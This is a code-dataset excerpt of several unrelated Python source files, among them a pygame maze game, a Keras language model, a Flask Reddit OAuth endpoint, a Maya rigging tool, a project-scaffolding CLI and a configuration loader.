pos[1] - text_size[1] //2\r\n screen.blit(text,pos)\r\n \r\n def load(self):\r\n self.icon = pygame.image.load(START_ICON)\r\n background = pygame.image.load('maze.png')\r\n self.background = pygame.transform.scale(background,(MAZE_WIDTH, MAZE_HEIGHT))\r\n\r\n def darw_grid(self):\r\n for x in range(WIDTH//self.cell_w):\r\n pygame.draw.line(self.background, GREY , (x*self.cell_w, 0),(x*self.cell_w, HEIGHT))\r\n for y in range(HEIGHT//self.cell_h):\r\n pygame.draw.line(self.background, GREY , (0, y * self.cell_h),(WIDTH, y*self.cell_h))\r\n##################### START FUNCTION ################################33\r\n\r\n def start_event(self):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.running = False\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n self.state = 'playing'\r\n print(\"Space press\")\r\n\r\n def start_update(self):\r\n pass\r\n def start_draw(self):\r\n self.screen.fill (BLACK)\r\n icon = pygame.transform.scale(self.icon, (100,100))\r\n self.screen.blit(icon,[WIDTH//2 -50, HEIGHT//2 -150])\r\n\r\n self.draw_text(\"PUSH SPACE BAR\",self.screen, [WIDTH//2, HEIGHT//2], START_TEXT_SIZE, (170,132,58) , START_FONT, center = True)\r\n self.draw_text(\"1 Player Only\",self.screen, [WIDTH//2, HEIGHT//2 + 50], START_TEXT_SIZE, (25, 73, 215) , START_FONT, center = True)\r\n self.draw_text(\"HIGHEST SCORE: {}\".format(self.score),self.screen, [4, 0], START_TEXT_SIZE, (255,255,255) , START_FONT)\r\n pygame.display.update()\r\n\r\n##################### Playing FUNCTION ################################33\r\n def playing_event(self):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.running = False\r\n \r\n\r\n def playing_update(self):\r\n pass\r\n def playing_draw(self):\r\n self.screen.fill(BLACK)\r\n self.screen.blit (self.background,(TOP_BOTTOM_BUFFER//2, TOP_BOTTOM_BUFFER//2))\r\n self.darw_grid()\r\n self.draw_text(\"CURRENT SCORE: {}\".format(0),self.screen, [50, 5], 18, WHITE , START_FONT)\r\n self.draw_text(\"HIGH SCORE: {}\".format(0),self.screen, [WIDTH//2, 5], 18, WHITE , START_FONT)\r\n pygame.display.update()","sub_path":"app_class.py","file_name":"app_class.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"103035955","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: language_model\n Description :\n Author : chenhao\n date: 2019-11-13\n-------------------------------------------------\n Change Activity:\n 2019-11-13:\n-------------------------------------------------\n\"\"\"\nfrom eigen_nltk.core import Context, ModelEstimator\nfrom eigen_nltk.trans import DataParser, remove_token_char\nfrom eigen_nltk.model_utils import get_lm_decoder_model\nfrom eigen_nltk.utils import padding_seq, list_find\nfrom eigen_nltk.optimizer import get_optimizer_cls\nfrom keras.losses import sparse_categorical_crossentropy\nfrom keras.layers import *\n\n\nclass LMContext(Context):\n def __init__(self, vocab_path):\n super().__init__(vocab_path)\n\n\nclass TransformerLM(ModelEstimator):\n\n def __init__(self, name, context, logger_level=\"INFO\"):\n assert isinstance(context, LMContext)\n self.context = context\n self.vocab_size = self.context.vocab_size\n data_parser = DataParser(context)\n super().__init__(name, data_parser, logger_level)\n\n def _build_model(self, embedding_dim, decoder_block_num, head_num, hidden_dim, embed_trainable=True, **kwargs):\n model = get_lm_decoder_model(vocab_size=self.vocab_size, embedding_dim=embedding_dim,\n decoder_num=decoder_block_num, head_num=head_num,\n hidden_dim=hidden_dim, embed_trainable=embed_trainable)\n\n return model\n\n def _compile_model(self, optimizer_name, optimizer_args, **kwargs):\n opt_cls = get_optimizer_cls(optimizer_name)\n optimizer = opt_cls(**optimizer_args)\n self.training_model.compile(optimizer, loss=sparse_categorical_crossentropy)\n return self.training_model\n\n def _get_predict_data_from_model_output(self, origin_data, enhanced_data, pred_data, show_detail=False):\n hard_pred = pred_data.argmax(axis=2).tolist()\n text_pred = [self._id_list2text(id_list) for id_list in hard_pred]\n return text_pred\n\n def _get_enhanced_data(self, data):\n enhance_data = []\n for idx, line in enumerate(data):\n tmp_item = dict(content=line)\n bert_input = self.data_parser.get_bert_input(line)\n input_token = bert_input['token'][:-1]\n output_token = bert_input[\"token\"][1:]\n x = bert_input['x'][:-1]\n y = bert_input['x'][1:]\n tmp_item.update(input_token=input_token, output_token=output_token, x=x, y=y)\n enhance_data.append(tmp_item)\n self.logger.info(\"get {0} enhanced data from {1} origin data\".format(len(enhance_data), len(data)))\n return enhance_data\n\n def _get_model_train_input(self, train_data, _max_len=128, **kwargs):\n x = []\n y = []\n max_len = max(len(e['x']) for e in train_data)\n max_len = min(max_len, _max_len)\n for item in train_data:\n x.append(padding_seq(item['x'], max_len))\n if 'y' in item.keys():\n y.append(padding_seq(item['y'], max_len))\n\n x = np.array(x)\n if y:\n y = np.array(y)[:, :, np.newaxis]\n return x, y\n\n def _id_list2text(self, id_list):\n token_list = self._id_list2token_list(id_list)\n text = \"\".join([remove_token_char(t) for t in token_list])\n return text\n\n def _id_list2token_list(self, id_list):\n token_list = [self.context.id2token[i] for i in id_list]\n return token_list\n\n def predict_next_token(self, data, batch_size=64, verbose=1):\n raw_pred = self._get_raw_predict(data, batch_size=batch_size, verbose=verbose)\n idx_pred = raw_pred.argmax(axis=2)[:, -1]\n token_pred = [self.context.id2token[i] for i in idx_pred]\n return token_pred\n\n def generate_sequence(self, data, max_len, batch_size=64, verbose=1, end_token='[SEP]'):\n enhance_data = self._get_enhanced_data(data)\n x = self._get_model_test_input(enhance_data)\n cur_len = x.shape[1]\n for i in range(max_len - cur_len):\n # print(x.shape)\n raw_pred = self.model.predict(x, batch_size=batch_size, verbose=verbose)\n last_pred = raw_pred.argmax(axis=2)[:, -1][:, np.newaxis]\n # print(last_pred.shape)\n x = np.concatenate([x, last_pred], axis=1)\n token_list = [self._id_list2token_list(id_list) for id_list in x]\n text_list = []\n print(token_list)\n for tokens in token_list:\n end_idx = list_find(tokens, end_token)\n tokens = tokens[1:] if end_idx == -1 else tokens[1:end_idx]\n text = \"\".join([remove_token_char(t) for t in tokens])\n text_list.append(text)\n\n return text_list\n","sub_path":"eigen_nltk/language_model.py","file_name":"language_model.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"161904738","text":"from flask_restful import Resource\nfrom flask_restful.reqparse import Argument\n\nfrom services import RedditService\nfrom utils import parse_params, IdentityManager\n\n\nclass RedditOAuth(Resource):\n \"\"\"\n Reddit OAuth process handler resource\n\n Detailed archived documentation can be found at https://github.com/reddit-archive/reddit/wiki/oauth2\n\n A Session object must be created to sustain the process with proper set user agent\n\n :param Resource: Inherit from base flask-restful resource class\n :type Resource: Resource\n :return: Reddit OAuth process resource class\n :rtype: Resource\n \"\"\"\n\n @staticmethod\n @parse_params(\n Argument(\"code\", location=\"args\", required=True),\n Argument(\"callback_url\", location=\"args\", required=True),\n )\n @IdentityManager.set_cookie(RedditService)\n def post(code, callback_url):\n \"\"\"\n POST endpoint for retrieving the access token given after acquiring authorization code\n\n :param code: A one-time use code that may be exchanged for a bearer token\n :type code: str\n :param callback_url: Callback URL from application domain\n :type callback_url: str\n :return: JSON data of access_token on event of success authorization\n :rtype: BaseResponse\n \"\"\"\n response = RedditService.exchange_token(code, callback_url)\n return response.data, response.status_code\n","sub_path":"server/api/resources/oauth/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"27738283","text":"import pymel.core as pm\nimport random \n\ndef rig_transformer_pieces( *args, **kwargs):\n\t'''\n\tUsage:\n\t\trig_transformer_pieces()\n\t'''\n\ttop_grp = pm.PyNode( 'model_GRP' )\n\tfor transform in select_polys_under_top_node( top_grp ):\n\t\trig_transformer_piece( transform )\n\ndef rig_transformer_piece( transform ):\n\t'''\n\tUsage:\n\t\trig_transformer_piece( pm.ls(sl=True)[0] )\n\t'''\n\tif get_parentConstraintPairs( transform):\n\t\t#create a control and store its groups/parts\n\t\tctrl_GRP = create_boundingBoxCtrl( transform )\n\t\tctrl = [ctrl for ctrl in ctrl_GRP.listRelatives( c=True, type='transform' ) if 'CTRL' in ctrl.name()][0]\n\t\tctrlCon_GRP = [con_grp for con_grp in ctrl.listRelatives( c=True, type='transform' ) if 'Con_GRP' in con_grp.name()][0]\n\t\t#get the parent constraint information and then remove it\n\t\ttarget_weight_pairs = get_parentConstraintPairs( transform )\n\t\tpm.delete( target_weight_pairs[1] )\n\t\t#setup the new space switching based on the old parent constraint\n\t\tparents = [target_weight_pairs[0][0][0], 'spineJA_JNT', 'spineJF_JNT', 'globalB_CTRL', 'worldSpace_GRP']\n\t\tparent_names = ['normal', 'hips', 'chest', 'global', 'world']\t\n\t\tctrl_setupSpaceSwitch( ctrl, ctrl_GRP, parents, parent_names )\n\t\t#control the object with the new space-switch controller\n\t\tpm.parentConstraint( ctrlCon_GRP, transform, mo=True )\n\t\tpm.scaleConstraint( ctrlCon_GRP, transform, mo=True )\n\telse:\n\t\t#if it didn't have a parentConstraint do nothing\n\t\treturn None\n\ndef ctrl_setupSpaceSwitch( driver, driven, parents, parent_names, attr_name='space' ):\n\t'''\n\tArgs:\n\t\tdriver (pm.nt.Transform): object to hold space switch attribute\n\t\tdriven (pm.nt.Transform): object to be constrained\n\t\tparents (list of pm.PyNode): parents to switch between\n\t\tparent_names (list of string): names of parents, must be same length as parents\n\t\tattr_name (string): name of attribute to control the asset, defaults as space\n\tReturns (pm.nt.ParentConstraint): space switching constraint created\n\t'''\n\t#first add the enum attr\n\tdriver.addAttr( attr_name, at='enum', en=':'.join(parent_names), k=True )\t\n\tconstraint = pm.parentConstraint( parents, driven, mo=True )\n\t#now create the on off condition nodes from the attr to the parent constraint\n\tweight_alias_list = constraint.getWeightAliasList()\n\t\n\tindex = 0\n\tfor parent, alias_attr in zip( parents, weight_alias_list ):\n\t\tcondition = pm.createNode( 'condition' )\n\t\tcondition.operation.set( 1 )\n\t\tdriver.attr(attr_name).connect( condition.firstTerm )\n\t\tcondition.secondTerm.set( index )\n\t\tcondition.outColorR.connect( alias_attr )\n\t\tindex += 1\n\treturn constraint\n\t\t\ndef get_parentConstraintPairs( transform ):\n\t'''\n\tUsage:\n\t\tget_parentConstraintPairs( pm.ls(sl=True)[0] )\n\t'''\n\tif transform.listConnections(type='parentConstraint'):\n\t\tparentConstraint = list( set( transform.listConnections(type='parentConstraint') ) )[0]\n\t\ttargets = parentConstraint.getTargetList()\n\t\tweight_attrs = parentConstraint.getWeightAliasList()\n\t\ttarget_weight_pairs = []\n\t\tfor target, weight_attr in zip( targets, weight_attrs ):\n\t\t\ttarget_weight_pairs.append( [target, weight_attr] )\n\t\treturn [ target_weight_pairs, parentConstraint ]\n\telse:\n\t\treturn None\n\ndef create_boundingBoxCtrl( transform ):\n\t'''\n\tUsage:\n\t\tcreate_boundingBoxCtrl( pm.ls(sl=True)[0] )\n\t'''\n\tbase_name = transform.name().replace('_GEO','') + 'Own'\n\n\tbbox = pm.exactWorldBoundingBox( transform, ii=True, ce=True )\n\tcenterX = (bbox[0] + bbox[3]) / 2.0\n\tcenterY = (bbox[1] + bbox[4]) / 2.0\n\tcenterZ = (bbox[2] + bbox[5]) / 2.0\n\tcenter_point = ( centerX, centerY, centerZ )\n\t\n\tp0=(bbox[0], bbox[1], bbox[2])\n\tp1=(bbox[0], bbox[1], bbox[5])\n\tp2=(bbox[0], bbox[4], bbox[2])\n\tp3=(bbox[0], bbox[4], bbox[5])\n\tp4=(bbox[3], bbox[4], bbox[2])\n\tp5=(bbox[3], bbox[4], bbox[5])\n\tp6=(bbox[3], bbox[1], bbox[2])\n\tp7=(bbox[3], bbox[1], bbox[5])\n\t\n\tpoints = [ p0, p1, p2, p3, p4, p5, p6, p7 ]\n\tpath_ids = [1,3,5,7,1,0,2,3,5,4,6,7,6,0,2,4]\n\tpath_values = []\n\t\n\tfor path_id in path_ids:\n\t\tpath_values.append( points[ path_id ] )\n\n\tcurve = pm.curve( p=path_values, n=(base_name+'_CTRL'), d=1 )\n\tcurve.rotatePivot.set( center_point )\n\tcurve.scalePivot.set( center_point )\n\tpm.move( curve, [0,0,0], rpr=True)\n\tpm.makeIdentity( curve, apply=True, n=0, t=True, r=True, s=True )\n\tcon_grp = pm.group( n=base_name+'Con_GRP', em=True )\n\tcon_grp.setParent( curve )\n\tgrp = pm.group( n=base_name+'Offset_GRP', em=True )\n\tpm.move( grp, center_point, rpr=True )\n\tcurve.setParent( grp, a=True )\n\tcurve.translate.set( [0,0,0] )\n\t\n\tshort_name = pm.ls( curve.name(), sn=True )[0].name()\n\tcolor = None\n\tleft_color = [ 6, 15, 29, 28, 18, 27 ]\n\tright_color = [ 13, 12, 31, 4, 30, 21 ]\n\tmiddle_color = [ 23, 11, 10, 25, 24, 7 ]\n\trandom_color = random.randint( 0, 5 )\n\t\n\tif short_name[0] == 'l':\n\t\tcolor = left_color[ random_color ]\n\telif short_name[0] == 'r':\n\t\tcolor = right_color[ random_color ]\n\telse:\n\t\tcolor = middle_color[ random_color ]\n\tcurve.getShape().overrideEnabled.set(1)\n\tcurve.getShape().overrideColor.set( color )\n\t\n\treturn grp\n\t\ndef select_polys_under_top_node( top_node ):\n\tresult = []\n\tfor transform in top_node.listRelatives(ad=True, type='transform'):\n\t\tif transform.getShape():\n\t\t\tpm.objectType( transform.getShape() ) == 'mesh'\n\t\t\tresult.append( transform )\n\treturn result","sub_path":"mel/aw/maya/1.0/job_specific/delta/rig_transformer.py","file_name":"rig_transformer.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"409294403","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n\"\"\"\nCREATE a NEW PROJECT\n\nthis script creates a 'full work ready' project from command line, including:\n - directory structure inside your $PROJECT_DIR\n - creation of the virtual-environment\n - first draft of common files like README.md, .gitignore & .env\n - .code-workspace & settings for vscode\n - complete git project initialisation & configuration\n - git flow initialisation, including first feature and release branches\n - pushing the repository to your GITHUB-Account\n \nrequired:\n - installed & available on your command-line: [GIT, curl]\n - virtualenvwrapper powershell (https://github.com/regisf/virtualenvwrapper-powershell)\n - a setup of your ENVIRONMENT-variables or a project_settings.json inside script-dir\n set at least:\n \"PROJECTS_DIR\" to your absolute project-path\n \"TOKEN\" to your GITHUB-CLI-Access-Token\n\"\"\"\n\n\"\"\"\nTODO:\n - check if required conditions are met / substitute curl with requests\n - add install of custom projects & requirements, folders, files\n - add other repo-services accounts (AZURE, bitbucket..)\n\"\"\"\n\n__version__ = \"0.2.0\"\n__author__ = \"oryon/dominik\"\n__date__ = \"April 01, 2019\"\n__updated__ = \"April 09, 2019\"\n\n\n# the name of the command alias in your shell - used to start this script\nCMD = \"newproject\"\n\n\nfrom argparse import ArgumentParser, RawTextHelpFormatter, SUPPRESS\nfrom pathlib import Path\nimport os\nimport sys\nimport subprocess\nimport textwrap\nfrom datetime import datetime\nimport getpass\nimport time\nimport shutil\nfrom json import load\nimport re\nimport requests\n\n\nDEFAULTS = {\n \"PROJECTS_DIR\": \"x:\\\\Meine Ablage\\\\_projects\",\n \"REPO\": \"GITHUB\",\n \"RELEASE\": \"0.1\", # starting-release number\n \"FEATURE\": \"Initial_Structure\", # first feature_name\n \"GIT_USER\": None,\n \"GIT_EMAIL\": None,\n}\n\n\nclass ArgParser(ArgumentParser):\n \"\"\"overwriting the parsers error-method to display help as error-default\"\"\"\n\n def error(self, message):\n self.print_help()\n sys.stderr.write(f\"\\nERROR: {message}\\n\")\n sys.exit(2)\n\n\ndef cmds_available():\n \"\"\"checks if required commands are installed\"\"\"\n if shutil.which(\"git\") is None:\n return False\n # TODO: add checks for virtualenvwrapper\n return True\n\n\ndef read_settings(filename=\"project_settings.json\", settings=DEFAULTS):\n \"\"\" reads settings file from disk \"\"\"\n script_path = Path(__file__).resolve().parent\n settings_path = Path(script_path, filename)\n # TODO: get settings from ENVS and/or local directory\n if not settings_path.exists():\n return settings\n else:\n with open(settings_path, \"r\") as file:\n try:\n loaded = load(file) # json.load\n for key in settings:\n if key not in loaded:\n loaded[key] = settings[key]\n return loaded\n except Exception as err:\n return settings\n\n\ndef print_status(message):\n \"\"\"prints status-messages **centered with dashes** while processing project-creation\"\"\"\n dashes = ((80 - len(message)) // 2) * \"-\"\n line = f\"{dashes}{message}{dashes}\"\n if len(line) % 2 != 0:\n line += \"-\"\n print(line)\n print()\n\n\ndef create(structure=\"basic\"):\n \"\"\"creating and filling all the basic files inside the working diretory\"\"\"\n\n def bedrock():\n README = textwrap.dedent(\n f\"\"\"\\\n # {NEW}\n \n {NEW} was created by {GIT_USER}({GIT_EMAIL}) at {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n \n \"\"\"\n )\n\n DOTENV = textwrap.dedent(\n \"\"\"\\\n PYTHONPATH=.\n \"\"\"\n )\n\n GITIGNORE = textwrap.dedent(\n f\"\"\"\\\n ## GIT is ignoring... (# Created by {GIT_USER})\n\n # git itself\n /.git/*\n\n # all logs\n *.log\n\n # vscode/settings\n /.vscode/*\n {NEW}.code-workspace\n\n # local-config\n /.env\n\n ### Python ###\n # precompiled\n __pycache__/\n *.py[cod]\n \"\"\"\n )\n\n VSCODE = textwrap.dedent(\n f\"\"\"\\\n {{\n \"folders\": [\n {{\n \"path\": \".\"\n }}\n ],\n \"settings\": {{\n \"files.autoSave\": \"onFocusChange\",\n \"python.venvPath\": \"~/Envs\",\n \"python.envFile\": \"${{workspaceFolder}}/.env\",\n \"python.terminal.activateEnvironment\": true,\n \"python.pythonPath\": \"C:\\\\\\\\Users\\\\\\\\{getpass.getuser()}\\\\\\\\envs\\\\\\\\{NEW}\\\\\\\\Scripts\\\\\\\\python.exe\",}}\n }}\n \"\"\"\n )\n\n with open(\".gitignore\", \"w\") as gitignore:\n gitignore.writelines(GITIGNORE)\n\n with open(\"README.md\", \"w\") as readme:\n readme.writelines(README)\n\n with open(f\"{NEW}.code-workspace\", \"w\") as vscode:\n vscode.writelines(VSCODE)\n\n with open(\".env\", \"w\") as dotenv:\n dotenv.writelines(DOTENV)\n\n if structure == \"basic\":\n bedrock()\n elif structure == \"flask\":\n bedrock()\n print(\"structure for flask-application is not implemented yet\")\n \"\"\"\n # best imported from python-submodule... new_flask_project.py\n import new_flask_project\n \n # see: https://www.digitalocean.com/community/tutorials/how-to-structure-large-flask-applications\n \n ~/LargeApp\n |-- run.py\n |-- config.py\n |__ /env # Virtual Environment\n |__ /app # Our Application Module\n |-- __init__.py\n |-- /module_one\n |-- __init__.py\n |-- controllers.py\n |-- models.py \n |__ /templates\n |__ /module_one\n |-- hello.html\n |__ /static\n |__ ..\n |__ .\n |__ ..\n |__ .\n \n mkdir ~/LargeApp\n mkdir ~/LargeApp/app\n mkdir ~/LargeApp/app/templates\n mkdir ~/LargeApp/app/static\n touch ~/LargeApp/run.py\n touch ~/LargeApp/config.py\n touch ~/LargeApp/app/__init__.py\n \n # install requirements inside the virtualenv..: pip install flask flask-sqlalchemy flask-wtf\n \n # fill run.py & config.py\n # etc ...\n \n new_flask_project.create()\n \n \"\"\"\n else:\n print(f\"structure for {structure} is not implemented yet\")\n\n\ndef init_project(structure=\"basic\"):\n \"\"\"processing all the shell-commands neccessary for the creation of a new-project\"\"\"\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n print_status(f\"Creating {NEW}\")\n\n # TODO: create error-catching & rollbacks\n\n projects = Path(PROJECTS_DIR)\n\n # switch to projects-directory\n os.chdir(str(projects))\n\n # $ mkdir <DIR>\n os.makedirs(NEW, exist_ok=True)\n new_project_path = projects / NEW\n\n # switch inside new_dir\n os.chdir(str(new_project_path))\n\n # mkvirtualenv <name>\n subprocess.call([\"powershell.exe\", \"mkvirtualenv\", NEW], shell=True)\n\n ## creating basic file & directory structure\n print_status(\"Creating Project-Structure\")\n create(structure)\n\n ## git init\n print_status(\"Initializing GIT\")\n subprocess.call(\"git init\", shell=True)\n subprocess.call(f'git config --local user.email \"{GIT_EMAIL}\"', shell=True)\n subprocess.call(f'git config --local user.name \"{GIT_USER}\"', shell=True)\n subprocess.call(\n f'git config --local core.sshCommand \"ssh -i ~/.ssh/id_rsa_{REPO}\"', shell=True\n )\n\n subprocess.call(\"git add .\", shell=True)\n subprocess.call('git commit -m \"Initial commit\"', shell=True)\n\n ## create public or private AZURE or GITHUB repo, set origin on github or azure\n print_status(\"Creating Repository\")\n if REPO == \"GITHUB\":\n subprocess.call(\n f'curl https://api.github.com/user/repos?access_token={TOKEN} -d \"{{\\\\\"name\\\\\": \\\\\"{NEW}\\\\\", \\\\\"private\\\\\": {str(PRIVATE).lower()}}}\"',\n shell=True,\n )\n subprocess.call(\n f\"git remote add origin git@github.com:{GIT_USER}/{NEW}.git\", shell=True\n )\n subprocess.call(\"git push -u origin master\", shell=True)\n else:\n print_status(\"Only GITHUB Repository Creation supported right now\")\n # POST https://dev.azure.com/{organization}/{project}/_apis/git/repositories\n # + project json\n\n print_status(\"Initializing GIT FLOW\")\n subprocess.call([\"git\", \"flow\", \"init\", \"-d\"], shell=True)\n\n subprocess.call(f'git config --local gitflow.prefix.feature \"feature/\"', shell=True)\n subprocess.call(f'git config --local gitflow.prefix.bugfix \"bugfix/\"', shell=True)\n subprocess.call(f'git config --local gitflow.prefix.release \"release/\"', shell=True)\n subprocess.call(f'git config --local gitflow.prefix.hotfix \"hotfix/\"', shell=True)\n subprocess.call(f'git config --local gitflow.prefix.support \"support/\"', shell=True)\n print_status(\"Set prefixes to feature/, bugfix/, release/, hotfix/, support/\")\n subprocess.call(\"git push -u origin develop\", shell=True)\n\n print_status(f\"Starting Release/{RELEASE}\")\n subprocess.call(f\"git flow release start {RELEASE}\", shell=True)\n subprocess.call(f\"git push -u origin release/{RELEASE}\", shell=True)\n\n print_status(f\"Starting Feature/{FEATURE}\")\n subprocess.call(f\"git flow feature start {FEATURE}\", shell=True)\n subprocess.call(f\"git push -u origin feature/{FEATURE}\", shell=True)\n\n print_status(f\"{NEW} created successfully\")\n print(f\"projects;cd {NEW};workon {NEW}\")\n\n\n# supported structures inside create()\nstructures = [\"flask\", \"django\"]\n\n# supported repositories:\nrepository_providers = [\"azure\", \"bitbucket\", \"github\"] # defaults on [-1]\n\n# set git user & email to git-config-values\nuser = (\n subprocess.check_output([\"git\", \"config\", \"user.name\"])\n .decode(\"utf-8\")\n .replace(\"\\n\", \"\")\n)\nemail = (\n subprocess.check_output([\"git\", \"config\", \"user.email\"])\n .decode(\"utf-8\")\n .replace(\"\\n\", \"\")\n)\nDEFAULTS[\"GIT_USER\"] = user\nDEFAULTS[\"GIT_EMAIL\"] = email\n\n# handling the arguments\nparser = ArgParser(\n description=__doc__,\n prog=f\"{CMD}\",\n epilog=f'Example usage: \"{CMD} world-domination --public\"\\n{\" \" * 15}\"{CMD} largeSecretApplication --app flask --repo azure\"',\n formatter_class=RawTextHelpFormatter,\n)\n\nparser.add_argument(\"--version\", action=\"version\", version=__version__)\nparser.add_argument(\n \"--public\",\n action=\"store_true\",\n help=\"The repository will be visible for anybody on the internet\",\n)\nparser.add_argument(\n \"name\",\n metavar=\"projectname\",\n help=\"The name of the project you want to create, doesn't accept spaces or underscores\",\n nargs=\"*\",\n)\nparser.add_argument(\n \"--app\",\n metavar=\", \".join(structures),\n default=\"basic\",\n const=\"basic\",\n nargs=\"?\",\n choices=structures,\n help=f\"create prebuild application structure\",\n)\nparser.add_argument(\n \"--repo\",\n metavar=\", \".join(repository_providers),\n nargs=\"?\",\n choices=repository_providers,\n help=f\"choose a provider for your repository (default: {repository_providers[-1]})\",\n)\nparser.add_argument(\n \"--user\",\n metavar=\"name\",\n nargs=\"?\",\n help=f\"provide the username for your repository\",\n)\nparser.add_argument(\n \"--email\",\n metavar=\"address\",\n nargs=\"?\",\n help=f\"provide the email-address for your repository\",\n)\n\n\nif __name__ == \"__main__\":\n\n args = parser.parse_args()\n settings = read_settings()\n\n # check: if used cmds (git etc.) are available\n if not cmds_available():\n parser.error(\"did not find required commands on the commandline\")\n\n # check: projectname\n NEW = \" \".join(args.name)\n if not args.name:\n while not NEW or \"_\" in NEW or \" \" in NEW:\n NEW = input(\n \"please enter a valid projectname (no spaces, no underscores) > \"\n )\n if \"_\" in \" \".join(args.name) or \" \" in \" \".join(args.name):\n parser.error(\"spaces or underscores are not allowed in projectname\")\n\n # check: PROJECT_DIRectory\n PROJECTS_DIR = os.environ.get(\"PROJECTS_DIR\", settings[\"PROJECTS_DIR\"])\n while not Path(PROJECTS_DIR).exists():\n sys.stderr.write(f\"\\nERROR: PROJECT_DIR ({PROJECTS_DIR}) does not exist.\\n\")\n PROJECTS_DIR = input(\"please enter a valid parent directory > \")\n\n # publish the repository to the public\n PRIVATE = not args.public\n\n # check: used REPOsitory provider\n if args.repo:\n REPO = args.repo.upper()\n else:\n REPO = settings[\"REPO\"].upper()\n if REPO not in [r.upper() for r in repository_providers]:\n parser.error(\n f'the repository provided in the settings ({settings[\"REPO\"]}) is not supported'\n )\n\n # check: user\n if args.user and args.user != settings[\"GIT_USER\"]:\n GIT_USER = args.user\n else:\n GIT_USER = settings[\"GIT_USER\"]\n if not re.match(r\"^[a-zA-Z0-9]+([_-]?[a-zA-Z0-9])*$\", GIT_USER):\n parser.error(f\"the username provided ({GIT_USER}) is invalid\")\n if not GIT_USER:\n parser.error(\"no username provided\")\n\n # check: email\n if args.email and args.email != settings[\"GIT_EMAIL\"]:\n GIT_EMAIL = args.email\n else:\n GIT_EMAIL = settings[\"GIT_EMAIL\"]\n if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", GIT_EMAIL):\n parser.error(f\"the email provided ({GIT_EMAIL}) is invalid\")\n if not GIT_EMAIL:\n parser.error(\"no e-Mail address provided\")\n\n # set release & feature branch-names\n RELEASE = settings[\"RELEASE\"]\n FEATURE = settings[\"FEATURE\"]\n\n # authentification\n AUTH = False\n TOKEN = os.environ.get(\"GITHUB_TOKEN\")\n while not AUTH:\n if not TOKEN:\n TOKEN = getpass.getpass(\n prompt=f\"{GIT_USER} please enter your personal {REPO} access token > \"\n )\n response = requests.get(\n \"https://api.github.com/\", headers={\"Authorization\": f\"token {TOKEN}\"}\n ).json() # TODO: GITHUB-specific!\n if \"message\" in response:\n if response[\"message\"] == \"Bad credentials\":\n TOKEN = None\n parser.error(\"authentification failed\")\n else:\n if os.environ.get(\"GITHUB_TOKEN\"):\n parser.error(response)\n else:\n print(response)\n TOKEN = None\n print(\"TOKEN reset\")\n input(\"press any key to continue or CTRL-C to quit\")\n else:\n AUTH = True\n\n # TODO: change when features are implemented\n if args.app != \"basic\":\n parser.error(f\"structure for {args.app} is not implemented yet\")\n elif args.repo and args.repo != \"github\":\n parser.error(f\"project creation on {args.repo} is not implemented yet\")\n\n # starting project initalization\n init_project(args.app)\n","sub_path":"scripts/python/new_project.py","file_name":"new_project.py","file_ext":"py","file_size_in_byte":15249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"277420807","text":"\nimport configparser\nfrom seasight_forecasting import global_vars\n\ndef LoadConfigFile():\n config = configparser.ConfigParser()\n configFilePath = r'app.conf'\n config.read(configFilePath)\n\n global_vars.historic_file_path = config['FILES']['historic_data_path'] + config['FILES']['historic_data_file']\n global_vars.prediction_model_path = config['FILES']['prediction_model_path'] + config['FILES']['prediction_model_file']\n global_vars.prediction_model_weights = config['FILES']['prediction_model_path'] + config['FILES']['prediction_model_weights']\n global_vars.north_atlantic_region_path = config['FILES']['regions_path'] + config['FILES']['north_atlantic_region_file']\n global_vars.south_atlantic_region_path = config['FILES']['regions_path'] + config['FILES']['south_atlantic_region_file']\n global_vars.indian_region_path = config['FILES']['regions_path'] + config['FILES']['indian_region_file']\n global_vars.west_pacific_region_path = config['FILES']['regions_path'] + config['FILES']['west_pacific_region_file']\n global_vars.north_east_pacific_region_path = config['FILES']['regions_path'] + config['FILES']['north_east_pacific_region_file']\n global_vars.south_east_pacific_region_path = config['FILES']['regions_path'] + config['FILES']['south_east_pacific_region_file']\n global_vars.kml_destination_path = config['FILES']['kml_destination_path']\n global_vars.kml_destination_filename = config['FILES']['kml_destination_file']\n global_vars.image_destination_path = config['FILES']['image_destination_path']\n global_vars.demo_files_path = config['FILES']['demo_files_path']\n\n global_vars.number_of_clusters = int(config['KML']['number_of_clusters'])\n global_vars.cmap = config['KML']['cmap']\n global_vars.sleep_in_thread = int(config['KML']['sleep_in_thread'])\n global_vars.altitude = int(config['KML']['altitude'])\n global_vars.pRange = int(config['KML']['range'])\n\n global_vars.server_IP = config['INSTALLATION']['server_IP']\n global_vars.lg_IP = config['INSTALLATION']['lg_IP']\n global_vars.lg_pass = config['INSTALLATION']['lg_pass']\n global_vars.screen_for_logos = int(config['INSTALLATION']['screen_for_logos'])\n global_vars.screen_for_colorbar = int(config['INSTALLATION']['screen_for_colorbar'])\n global_vars.project_location = config['INSTALLATION']['project_location']\n global_vars.logs = config['INSTALLATION']['logs']\n global_vars.show_verbose = config['INSTALLATION']['show_verbose']\n\n print('Global variables loaded!')\n","sub_path":"liquid_galaxy/ConfigurationFile.py","file_name":"ConfigurationFile.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"446798563","text":"import random\r\nimport os\r\nimport shutil\r\nimport subprocess\r\n\r\nfor s in range(1, 31):\r\n # 